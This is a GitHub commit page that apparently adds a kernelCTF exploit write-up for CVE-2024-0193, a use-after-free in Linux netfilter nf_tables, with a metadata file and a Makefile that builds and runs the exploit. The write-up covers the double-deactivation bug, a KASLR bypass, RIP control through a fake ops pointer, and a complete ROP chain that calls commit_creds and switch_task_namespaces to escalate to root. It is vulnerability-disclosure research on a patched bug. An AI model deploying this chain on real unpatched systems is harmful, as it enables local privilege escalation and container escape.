Skip to content

Commit 8275a6a

Browse files
mingiMingi Cho
and
Mingi Cho
authored
Add kernelCTF CVE-2024-0193_mitigation (#121)
Co-authored-by: Mingi Cho <[email protected]>
1 parent 84ae644 commit 8275a6a

File tree

8 files changed

+1370
-0
lines changed

8 files changed

+1370
-0
lines changed
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,214 @@
1+
# Overview
2+
3+
This vulnerability was discovered by Kevin Rich, and his write-up targeting the LTS kernel can be found [here](https://github.com/google/security-research/tree/master/pocs/linux/kernelctf/CVE-2024-0193_lts).
4+
5+
The vulnerability is caused by not validating whether the set is deleted or not when performing GC on set elements. First, deleting the set calls the `nft_delset` function, which decrements the reference count of objects mapped to the set elements in the `nft_map_deactivate` function [1].
6+
7+
```c
8+
static int nft_delset(const struct nft_ctx *ctx, struct nft_set *set)
9+
{
10+
int err;
11+
12+
err = nft_trans_set_add(ctx, NFT_MSG_DELSET, set);
13+
if (err < 0)
14+
return err;
15+
16+
if (set->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
17+
nft_map_deactivate(ctx, set); // [1]
18+
19+
nft_deactivate_next(ctx->net, set);
20+
nft_use_dec(&ctx->table->use);
21+
22+
return err;
23+
}
24+
```
25+
26+
Then, during the GC process, the `nft_trans_gc_catchall_sync` function is called, and the reference count of the object mapped to the element is decremented once more in the `nft_setelem_data_deactivate` function [2].
27+
28+
```c
29+
struct nft_trans_gc *nft_trans_gc_catchall_sync(struct nft_trans_gc *gc)
30+
{
31+
struct nft_set_elem_catchall *catchall, *next;
32+
const struct nft_set *set = gc->set;
33+
struct nft_set_elem elem;
34+
struct nft_set_ext *ext;
35+
36+
WARN_ON_ONCE(!lockdep_commit_lock_is_held(gc->net));
37+
38+
list_for_each_entry_safe(catchall, next, &set->catchall_list, list) {
39+
ext = nft_set_elem_ext(set, catchall->elem);
40+
41+
if (!nft_set_elem_expired(ext))
42+
continue;
43+
44+
gc = nft_trans_gc_queue_sync(gc, GFP_KERNEL);
45+
if (!gc)
46+
return NULL;
47+
48+
memset(&elem, 0, sizeof(elem));
49+
elem.priv = catchall->elem;
50+
51+
nft_setelem_data_deactivate(gc->net, gc->set, &elem); // [2]
52+
nft_setelem_catchall_destroy(catchall);
53+
nft_trans_gc_elem_add(gc, elem.priv);
54+
}
55+
56+
return gc;
57+
}
58+
```
59+
60+
# KASLR Bypass and Information Leak
61+
62+
To bypass KASLR, I used a timing side-channel attack to leak the kernel base. I then placed a fake ops structure in the non-randomized CPU entry area (CVE-2023-0597), so no heap address leak is needed.
63+
64+
# RIP Control
65+
66+
```c
67+
struct nft_chain {
68+
struct nft_rule_blob __rcu *blob_gen_0;
69+
struct nft_rule_blob __rcu *blob_gen_1;
70+
struct list_head rules;
71+
struct list_head list;
72+
struct rhlist_head rhlhead;
73+
struct nft_table *table;
74+
u64 handle;
75+
u32 use;
76+
u8 flags:5,
77+
bound:1,
78+
genmask:2;
79+
char *name;
80+
u16 udlen;
81+
u8 *udata;
82+
83+
/* Only used during control plane commit phase: */
84+
struct nft_rule_blob *blob_next;
85+
};
86+
```
87+
88+
When the vulnerability is triggered, the freed `chain->blob_gen_0` can be accessed via `immediate expr`.
89+
90+
```c
91+
unsigned int
92+
nft_do_chain(struct nft_pktinfo *pkt, void *priv)
93+
{
94+
...
95+
do_chain:
96+
if (genbit)
97+
blob = rcu_dereference(chain->blob_gen_1);
98+
else
99+
blob = rcu_dereference(chain->blob_gen_0);
100+
101+
rule = (struct nft_rule_dp *)blob->data;
102+
last_rule = (void *)blob->data + blob->size;
103+
next_rule:
104+
regs.verdict.code = NFT_CONTINUE;
105+
for (; rule < last_rule; rule = nft_rule_next(rule)) {
106+
nft_rule_dp_for_each_expr(expr, last, rule) {
107+
if (expr->ops == &nft_cmp_fast_ops)
108+
nft_cmp_fast_eval(expr, &regs);
109+
else if (expr->ops == &nft_cmp16_fast_ops)
110+
nft_cmp16_fast_eval(expr, &regs);
111+
else if (expr->ops == &nft_bitwise_fast_ops)
112+
nft_bitwise_fast_eval(expr, &regs);
113+
else if (expr->ops != &nft_payload_fast_ops ||
114+
!nft_payload_fast_eval(expr, &regs, pkt))
115+
expr_call_ops_eval(expr, &regs, pkt);
116+
117+
if (regs.verdict.code != NFT_CONTINUE)
118+
break;
119+
}
120+
```
121+
122+
```c
123+
static void expr_call_ops_eval(const struct nft_expr *expr,
124+
struct nft_regs *regs,
125+
struct nft_pktinfo *pkt)
126+
{
127+
#ifdef CONFIG_RETPOLINE
128+
unsigned long e = (unsigned long)expr->ops->eval;
129+
#define X(e, fun) \
130+
do { if ((e) == (unsigned long)(fun)) \
131+
return fun(expr, regs, pkt); } while (0)
132+
133+
X(e, nft_payload_eval);
134+
X(e, nft_cmp_eval);
135+
X(e, nft_counter_eval);
136+
X(e, nft_meta_get_eval);
137+
X(e, nft_lookup_eval);
138+
X(e, nft_range_eval);
139+
X(e, nft_immediate_eval);
140+
X(e, nft_byteorder_eval);
141+
X(e, nft_dynset_eval);
142+
X(e, nft_rt_get_eval);
143+
X(e, nft_bitwise_eval);
144+
#undef X
145+
#endif /* CONFIG_RETPOLINE */
146+
expr->ops->eval(expr, regs, pkt);
147+
}
148+
```
149+
150+
`chain->blob_gen_0` is used in `nft_do_chain`, and `expr_call_ops_eval` calls `expr->ops->eval` to evaluate each expression. We point the ops of the fake expr at the CPU entry area to control RIP, and make the fake blob object larger than 0x2000 bytes so that it is allocated by the page allocator.
151+
152+
# Post-RIP
153+
154+
The ROP payload is stored in `chain->blob_gen_0`, which is allocated by the page allocator.
155+
156+
```c
157+
void rop_chain(uint64_t* data){
158+
int i = 0;
159+
160+
data[i++] = 0x100;
161+
data[i++] = 0x100;
162+
data[i++] = PAYLOAD_LOCATION(1) + offsetof(struct cpu_entry_area_payload, nft_expr_eval);
163+
164+
// current = find_task_by_vpid(getpid())
165+
data[i++] = kbase + POP_RDI_RET;
166+
data[i++] = getpid();
167+
data[i++] = kbase + FIND_TASK_BY_VPID;
168+
169+
// current += offsetof(struct task_struct, rcu_read_lock_nesting)
170+
data[i++] = kbase + POP_RSI_RET;
171+
data[i++] = RCU_READ_LOCK_NESTING_OFF;
172+
data[i++] = kbase + ADD_RAX_RSI_RET;
173+
174+
// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
175+
data[i++] = kbase + POP_RCX_RET;
176+
data[i++] = 0;
177+
data[i++] = kbase + MOV_RAX_RCX_RET;
178+
179+
// Bypass "schedule while atomic": set oops_in_progress = 1
180+
data[i++] = kbase + POP_RDI_RET;
181+
data[i++] = 1;
182+
data[i++] = kbase + POP_RSI_RET;
183+
data[i++] = kbase + OOPS_IN_PROGRESS;
184+
data[i++] = kbase + MOV_RSI_RDI_RET;
185+
186+
// commit_creds(&init_cred)
187+
data[i++] = kbase + POP_RDI_RET;
188+
data[i++] = kbase + INIT_CRED;
189+
data[i++] = kbase + COMMIT_CREDS;
190+
191+
// find_task_by_vpid(1)
192+
data[i++] = kbase + POP_RDI_RET;
193+
data[i++] = 1;
194+
data[i++] = kbase + FIND_TASK_BY_VPID;
195+
196+
data[i++] = kbase + POP_RSI_RET;
197+
data[i++] = 0;
198+
199+
// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
200+
data[i++] = kbase + MOV_RDI_RAX_RET;
201+
data[i++] = kbase + POP_RSI_RET;
202+
data[i++] = kbase + INIT_NSPROXY;
203+
data[i++] = kbase + SWITCH_TASK_NAMESPACES;
204+
205+
data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE;
206+
data[i++] = 0;
207+
data[i++] = 0;
208+
data[i++] = _user_rip;
209+
data[i++] = _user_cs;
210+
data[i++] = _user_rflags;
211+
data[i++] = _user_sp;
212+
data[i++] = _user_ss;
213+
}
214+
```
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,12 @@
1+
- Requirements:
2+
- Capabilities: CAP_NET_ADMIN
3+
- Kernel configuration: CONFIG_NETFILTER, CONFIG_NF_TABLES
4+
- User namespaces required: Yes
5+
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5f68718b34a5 (netfilter: nf_tables: GC transaction API to avoid race with control plane)
6+
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7315dc1e122c85ffdfc8defffbb8f8b616c2eb1a (netfilter: nf_tables: skip set commit for deleted/destroyed sets)
7+
- Affected Version: v6.5-rc6 - v6.7-rc8
8+
- Affected Component: net/netfilter
9+
- Cause: Use-After-Free
10+
- Syscall to disable: disallow unprivileged user namespaces
11+
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0193
12+
- Description: A use-after-free flaw was found in the netfilter subsystem of the Linux kernel. If the catchall element is garbage-collected when the pipapo set is removed, the element can be deactivated twice. This can cause a use-after-free issue on an NFT_CHAIN object or NFT_OBJECT object, allowing a local unprivileged user with CAP_NET_ADMIN capability to escalate their privileges on the system.
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,35 @@
1+
LIBMNL_DIR = $(realpath ./)/libmnl_build
2+
LIBNFTNL_DIR = $(realpath ./)/libnftnl_build
3+
4+
exploit:
5+
gcc -o exploit exploit.c -L$(LIBNFTNL_DIR)/install/lib -L$(LIBMNL_DIR)/install/lib -lnftnl -lmnl -I$(LIBNFTNL_DIR)/libnftnl-1.2.5/include -I$(LIBMNL_DIR)/libmnl-1.0.5/include -static -s
6+
7+
prerequisites: libmnl-build libnftnl-build
8+
9+
libmnl-build : libmnl-download
10+
tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2
11+
cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install`
12+
cd $(LIBMNL_DIR)/libmnl-1.0.5 && make
13+
cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install
14+
15+
libnftnl-build : libmnl-build libnftnl-download
16+
tar -C $(LIBNFTNL_DIR) -xvf $(LIBNFTNL_DIR)/libnftnl-1.2.5.tar.xz
17+
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && PKG_CONFIG_PATH=$(LIBMNL_DIR)/install/lib/pkgconfig ./configure --enable-static --prefix=`realpath ../install`
18+
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && C_INCLUDE_PATH=$(C_INCLUDE_PATH):$(LIBMNL_DIR)/install/include LD_LIBRARY_PATH=$(LD_LIBRARY_PATH):$(LIBMNL_DIR)/install/lib make
19+
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && make install
20+
21+
libmnl-download :
22+
mkdir $(LIBMNL_DIR)
23+
wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2
24+
25+
libnftnl-download :
26+
mkdir $(LIBNFTNL_DIR)
27+
wget -P $(LIBNFTNL_DIR) https://netfilter.org/projects/libnftnl/files/libnftnl-1.2.5.tar.xz
28+
29+
run:
30+
./exploit
31+
32+
clean:
33+
rm -rf $(LIBMNL_DIR)
34+
rm -rf $(LIBNFTNL_DIR)
35+
rm -f exploit

0 commit comments

Comments
 (0)